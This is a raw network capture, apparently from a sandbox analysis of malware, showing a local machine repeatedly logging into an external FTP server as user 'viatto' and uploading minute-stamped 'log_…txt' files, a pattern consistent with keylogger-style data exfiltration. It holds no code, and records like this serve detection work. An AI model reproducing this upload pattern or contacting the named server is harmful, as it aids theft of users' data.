                                                                                                                                    Oct 10, 2022 06:03:51.581958055 CEST5007321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:51.604692936 CEST2150073185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:51.605103016 CEST5007321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:51.627666950 CEST2150073185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:51.628067017 CEST5007321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:51.651271105 CEST2150073185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:51.652371883 CEST5007321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:51.675126076 CEST2150073185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:51.680425882 CEST5007321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:51.703342915 CEST2150073185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,222)
                                                                                                                                    Oct 10, 2022 06:03:51.734750032 CEST5007321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.07.txt
                                                                                                                                    Oct 10, 2022 06:03:51.758021116 CEST2150073185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:51.781795979 CEST2150073185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:51.991210938 CEST2150075185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:51.991250038 CEST2150075185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:51.991384029 CEST2150075185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:51.991671085 CEST5007521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:52.016561985 CEST2150075185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:52.016911983 CEST5007521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:52.040802002 CEST2150075185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:52.044047117 CEST5007521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:52.069013119 CEST2150075185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:52.069340944 CEST5007521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:52.094690084 CEST2150075185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:52.096024036 CEST5007521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:52.124479055 CEST2150075185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:52.125966072 CEST5007521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:52.149990082 CEST2150075185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,223)
                                                                                                                                    Oct 10, 2022 06:03:52.173500061 CEST5007521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.08.txt
                                                                                                                                    Oct 10, 2022 06:03:52.200565100 CEST2150075185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:52.224780083 CEST2150075185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:52.414434910 CEST2150077185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:52.414486885 CEST2150077185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:52.414520025 CEST2150077185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:52.414937019 CEST5007721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:52.438009024 CEST2150077185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:52.461564064 CEST5007721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:52.484519005 CEST2150077185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:52.484822989 CEST5007721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:52.507483006 CEST2150077185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:52.507755995 CEST5007721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:52.530730009 CEST2150077185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:52.535638094 CEST5007721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:52.558455944 CEST2150077185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:52.559434891 CEST5007721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:52.582442999 CEST2150077185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,224)
                                                                                                                                    Oct 10, 2022 06:03:52.607893944 CEST5007721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.09.txt
                                                                                                                                    Oct 10, 2022 06:03:52.631508112 CEST2150077185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:52.661096096 CEST2150077185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:52.860380888 CEST2150079185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:52.860409975 CEST2150079185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:52.860536098 CEST2150079185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:52.860699892 CEST5007921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:52.886113882 CEST2150079185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:52.886322975 CEST5007921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:52.911607027 CEST2150079185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:52.911869049 CEST5007921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:52.939438105 CEST2150079185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:52.939743996 CEST5007921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:52.967588902 CEST2150079185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:52.970077991 CEST5007921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:52.997805119 CEST2150079185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:52.999123096 CEST5007921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:53.027365923 CEST2150079185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,225)
                                                                                                                                    Oct 10, 2022 06:03:53.055372953 CEST5007921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.10.txt
                                                                                                                                    Oct 10, 2022 06:03:53.080440998 CEST2150079185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:53.110980988 CEST2150079185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:53.323663950 CEST2150081185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:53.323702097 CEST2150081185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:53.324074984 CEST2150081185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:53.325237989 CEST5008121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:53.349221945 CEST2150081185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:53.349503040 CEST5008121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:53.373909950 CEST2150081185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:53.374226093 CEST5008121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:53.398117065 CEST2150081185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:53.398449898 CEST5008121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:53.424968958 CEST2150081185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:53.425911903 CEST5008121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:53.450515032 CEST2150081185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:53.465919971 CEST5008121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:53.490916014 CEST2150081185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,227)
                                                                                                                                    Oct 10, 2022 06:03:53.516134977 CEST5008121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.11.txt
                                                                                                                                    Oct 10, 2022 06:03:53.543024063 CEST2150081185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:53.570210934 CEST2150081185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:53.763231039 CEST2150083185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:53.763470888 CEST2150083185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:53.763859987 CEST2150083185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:53.765573978 CEST5008321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:53.789980888 CEST2150083185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:53.790281057 CEST5008321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:53.815368891 CEST2150083185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:53.820992947 CEST5008321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:53.846671104 CEST2150083185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:53.851664066 CEST5008321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:53.876812935 CEST2150083185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:53.878119946 CEST5008321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:53.902745962 CEST2150083185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:53.905267000 CEST5008321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:53.929667950 CEST2150083185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,228)
                                                                                                                                    Oct 10, 2022 06:03:53.959606886 CEST5008321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.12.txt
                                                                                                                                    Oct 10, 2022 06:03:53.987550020 CEST2150083185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:54.018281937 CEST2150083185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:54.217379093 CEST2150085185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:54.217444897 CEST2150085185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:54.217479944 CEST2150085185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:54.222973108 CEST5008521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:54.246968985 CEST2150085185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:54.247426033 CEST5008521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:54.271327972 CEST2150085185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:54.275744915 CEST5008521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:54.299959898 CEST2150085185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:54.300601959 CEST5008521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:54.324978113 CEST2150085185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:54.327048063 CEST5008521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:54.353704929 CEST2150085185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:54.354854107 CEST5008521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:54.380363941 CEST2150085185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,229)
                                                                                                                                    Oct 10, 2022 06:03:54.405013084 CEST5008521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.13.txt
                                                                                                                                    Oct 10, 2022 06:03:54.429776907 CEST2150085185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:54.454097033 CEST2150085185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:55.661215067 CEST2150087185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:55.661257982 CEST2150087185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:55.661283970 CEST2150087185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:55.661546946 CEST5008721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:55.684190035 CEST2150087185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:55.684416056 CEST5008721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:55.707448006 CEST2150087185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:55.708271027 CEST5008721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:55.731100082 CEST2150087185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:55.731584072 CEST5008721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:55.754692078 CEST2150087185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:55.755150080 CEST5008721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:55.778633118 CEST2150087185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:55.780359983 CEST5008721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:55.803649902 CEST2150087185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,230)
                                                                                                                                    Oct 10, 2022 06:03:55.827986956 CEST5008721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.14.txt
                                                                                                                                    Oct 10, 2022 06:03:55.851818085 CEST2150087185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:55.875665903 CEST2150087185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:56.065210104 CEST2150089185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:56.065268040 CEST2150089185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:56.065304995 CEST2150089185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:56.068557978 CEST5008921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:56.092892885 CEST2150089185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:56.093586922 CEST5008921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:56.117925882 CEST2150089185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:56.118798971 CEST5008921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:56.142293930 CEST2150089185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:56.142944098 CEST5008921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:56.168447018 CEST2150089185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:56.170063019 CEST5008921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:56.194113970 CEST2150089185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:56.195173979 CEST5008921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:56.221625090 CEST2150089185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,231)
                                                                                                                                    Oct 10, 2022 06:03:56.247752905 CEST5008921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.15.txt
                                                                                                                                    Oct 10, 2022 06:03:56.275382042 CEST2150089185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:56.310560942 CEST2150089185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:56.517122030 CEST2150091185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:56.517164946 CEST2150091185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:56.517180920 CEST2150091185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:56.517505884 CEST5009121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:56.540863991 CEST2150091185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:56.585004091 CEST5009121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:56.608364105 CEST2150091185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:56.763937950 CEST5009121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:56.787090063 CEST2150091185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:56.841212988 CEST5009121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:56.864757061 CEST2150091185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:56.865367889 CEST5009121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:56.888106108 CEST2150091185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:56.926199913 CEST5009121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:56.949796915 CEST2150091185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,233)
                                                                                                                                    Oct 10, 2022 06:03:56.978820086 CEST5009121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.16.txt
                                                                                                                                    Oct 10, 2022 06:03:57.002273083 CEST2150091185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:57.050189018 CEST2150091185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:57.330847979 CEST2150093185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:57.330977917 CEST2150093185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:57.331010103 CEST2150093185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:57.357772112 CEST5009321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:57.381843090 CEST2150093185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:57.382234097 CEST5009321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:57.405963898 CEST2150093185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:57.415124893 CEST5009321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:57.439899921 CEST2150093185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:57.491251945 CEST5009321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:57.516221046 CEST2150093185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:57.520245075 CEST5009321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:57.543781042 CEST2150093185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:57.958065987 CEST5009321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:57.985816956 CEST2150093185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,234)
                                                                                                                                    Oct 10, 2022 06:03:58.046457052 CEST5009321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.17.txt
                                                                                                                                    Oct 10, 2022 06:03:58.071624994 CEST2150093185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:58.120826960 CEST2150093185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:58.362493992 CEST2150095185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:58.362549067 CEST2150095185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:58.362658978 CEST2150095185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:58.366389990 CEST5009521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:58.389357090 CEST2150095185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:58.423511028 CEST5009521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:58.446824074 CEST2150095185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:58.447216988 CEST5009521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:58.470837116 CEST2150095185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:58.475332022 CEST5009521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:58.498678923 CEST2150095185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:58.565574884 CEST5009521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:58.589014053 CEST2150095185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:59.185056925 CEST5009521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:59.209181070 CEST2150095185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,236)
                                                                                                                                    Oct 10, 2022 06:03:59.285825968 CEST5009521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.18.txt
                                                                                                                                    Oct 10, 2022 06:03:59.309169054 CEST2150095185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:59.377827883 CEST2150095185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:59.598258018 CEST2150097185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:59.598306894 CEST2150097185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:59.598340034 CEST2150097185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:59.598587990 CEST5009721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:59.623230934 CEST2150097185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:59.624073029 CEST5009721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:59.648813009 CEST2150097185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:59.652796030 CEST5009721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:59.678145885 CEST2150097185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:59.678461075 CEST5009721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:59.703923941 CEST2150097185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:59.704864025 CEST5009721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:59.730492115 CEST2150097185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:59.733311892 CEST5009721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:59.758306980 CEST2150097185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,237)
                                                                                                                                    Oct 10, 2022 06:03:59.789380074 CEST5009721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.19.txt
                                                                                                                                    Oct 10, 2022 06:03:59.814800024 CEST2150097185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:59.842479944 CEST2150097185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:04:00.069067001 CEST2150099185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:04:00.069117069 CEST2150099185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:04:00.069150925 CEST2150099185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:04:00.072339058 CEST5009921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:04:00.096733093 CEST2150099185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:04:00.097009897 CEST5009921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:04:00.121229887 CEST2150099185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:04:00.121537924 CEST5009921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:04:00.146265984 CEST2150099185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:04:00.147212982 CEST5009921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:04:00.172055006 CEST2150099185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:04:00.178039074 CEST5009921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:04:00.205189943 CEST2150099185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:04:00.206296921 CEST5009921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:04:00.230429888 CEST2150099185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,238)
